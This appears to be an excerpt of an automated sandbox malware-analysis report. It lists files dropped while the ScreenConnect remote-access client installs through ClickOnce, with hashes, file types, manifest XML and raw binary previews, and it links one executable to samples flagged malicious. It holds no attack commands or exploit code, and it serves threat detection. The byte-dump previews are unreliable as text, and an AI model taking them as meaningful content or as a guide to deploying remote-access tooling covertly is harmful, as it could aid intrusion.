                                                                                                                                                                                                                                                      Preview:PcmH..............D.#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........U..........'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................l...............................................l...............................................l...............................................l...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1215
                                                                                                                                                                                                                                                      Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                      MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                      SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                      SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                      SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5256
                                                                                                                                                                                                                                                      Entropy (8bit):3.951576570549869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:jw4+Rzg5heV+Ww7kkKJOlVAlWVgvljwnANbz:aRzg4JuKS6EVJAp
                                                                                                                                                                                                                                                      MD5:D028B077E075F702841F7A735AB8ED23
                                                                                                                                                                                                                                                      SHA1:9F37FF688D91121BD7EC092B88D0E55AD0E953D7
                                                                                                                                                                                                                                                      SHA-256:32DDC98DA862DEC48FAB02ABAA1057DCE62933C8896B07D8723A36887473508F
                                                                                                                                                                                                                                                      SHA-512:B0D999B7415E06B0E68EC0C05D6C00178E99ED3997824A058930ED91AAE343EB6268855513C25DD9FEA3F31FB01C4F56447F2E92550D2CF96EABBF2BA04888AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........)..H..q.4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........U..........[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u".....E..X.%...s".I...R&...F.....Ey)....+.`...m,......;../............... ...#...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$...(...8.......`.......h.......x...(.......................(...............................(... .......H.......P...(...`...................(.......................(...............d...........l...............................................l...............................................l...............................................l...............................................l.......................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1980
                                                                                                                                                                                                                                                      Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                      MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                      SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                      SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                      SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6584
                                                                                                                                                                                                                                                      Entropy (8bit):3.8583768102805798
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:sTh0PPBpRieV+Www+8Wp5x32eeugEuA6QwIwozLTVqO/t7:sOPPvJyp5kv5pAbVR
                                                                                                                                                                                                                                                      MD5:C4204C0185307C52F05A3D69537A4D24
                                                                                                                                                                                                                                                      SHA1:43D29EB782E0FD59FCA4034FD3C497F013E6279F
                                                                                                                                                                                                                                                      SHA-256:1D8A06C1489853E5D140A9488A181EB46FFA682BD96C797FD0D4AD81831DFE69
                                                                                                                                                                                                                                                      SHA-512:CA6EF4A3FCA94B5D27A29082AF70150AB4D3423D0C6525C38C26C43C686F4D2E825DA26647FDFE75C95910DF68A5454282729EE66C915D9847A98779EE9BF536
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH.........S.....)@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........U..............}'.d................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d."....B(.....#...C.....&...^.ie...u).....E..X.,...F.....Ey/...O.&r..Vz2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......x...(...............................(.......................(...........D.......L...(...`...................(.......................(.......................(...,.......T.......\...(...h...................(.......................(...........................................................................l.......................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2569
                                                                                                                                                                                                                                                      Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                      MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                      SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                      SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                      SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3032
                                                                                                                                                                                                                                                      Entropy (8bit):4.462772651353851
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ma6Q/cggJ0e6S+9oww7gk7FaOoT/cLwwL+qcfnwbOA:maV/cGeV+WwwFFaOog8wL+jfnEOA
                                                                                                                                                                                                                                                      MD5:38B53F032728A8F590B59948103E5C83
                                                                                                                                                                                                                                                      SHA1:7AEF8D3B94A8BEF38D42FA9318C18C32B93BBFCC
                                                                                                                                                                                                                                                      SHA-256:3F04510F0C2A3338FFCF6B0121EBC5B0B43E21592A7C65044E48026ADDD6F940
                                                                                                                                                                                                                                                      SHA-512:09636E9E55B15C0759278FCB2679EA6591A11F0CC603B32A72188A1A31E1263A239AA5BC1190167C227B2FBE5680788CA85971F3B46C648BDE63FD919928BCC1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH.........=I....}............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........U............S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................l...............................................l...............................................l...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............<...........MdSp ...$....... ..."............... urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                                                                                                      Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                      MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                      SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                      SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                      SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14608
                                                                                                                                                                                                                                                      Entropy (8bit):5.7142108599202555
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:l1xT9rI6wOvx58s8oEtYLN8s8oTN2x2QPIlFDLhEDh7BqWojO3:l1V9rI6wAX9LX9R/QPIBM7Yj0
                                                                                                                                                                                                                                                      MD5:FE98F26D5DB4E7866DE4489F168BA28F
                                                                                                                                                                                                                                                      SHA1:E52EE6EB7A90306D3537B3141A4C8B1BF2FC6027
                                                                                                                                                                                                                                                      SHA-256:82541E45E82B18A38DFE5D1EC5443CAFFE95B31BCEC378AE554F7BD236E9EEBD
                                                                                                                                                                                                                                                      SHA-512:483AA57826B1650660BB3B4553F7BB0441E89800E69B3DFE3E13E4459E8A42A7066BEE007610E2880E5E4D9185AE126858259D3B253E2EEB47C9683D7E7E9868
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........qf.Q..X.$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........U...............8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%V..>...V.[;..jq.......3.............-........................E..................................l...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client................................... P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.3.8936%........................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118229
                                                                                                                                                                                                                                                      Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                      MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                      SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                      SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                      SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4428
                                                                                                                                                                                                                                                      Entropy (8bit):4.067107952546464
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:FjCDvx+1gJhe6S+9ow87g5W75uvsbO2V4glKvfvfTh5aTyA9Uvso9f:FjkeV+Ww8+45u6OrglKvvThkTyOmBf
                                                                                                                                                                                                                                                      MD5:705A8D85747155E81CA66F9E71B861E9
                                                                                                                                                                                                                                                      SHA1:45ACF93004EEDEC1C20D1B4E42C0CCBFFBD5E111
                                                                                                                                                                                                                                                      SHA-256:B57F40E1B6057D4E2B58BDB53F8BDD40A89A35DEBC4A08303222DB7BA7E1548C
                                                                                                                                                                                                                                                      SHA-512:FEA00CBB6672B35D087633A2F3881967085839374FC710A47B6FDBAD4239685C5103B59457EDFECC2B0B2935B78C5BA8599ADD2C44AB7479827162C62558416B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........+.._.c..,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........U.............6...................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d......B(...........E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...............................................l...............................................l...............................................l...............................................l...............................................l...............................................l...nameScreenConnect.Cl

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1632
                                                                                                                                                                                                                                                      Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                      MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                      SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                      SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                      SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):95520
                                                                                                                                                                                                                                                      Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                      MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                      SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                      SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: xrWUzly94Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: EPCo9k8NIn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: X5zNv1VJia.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: AmedVA2n92.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):61216
                                                                                                                                                                                                                                                      Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                      Encrypted:false
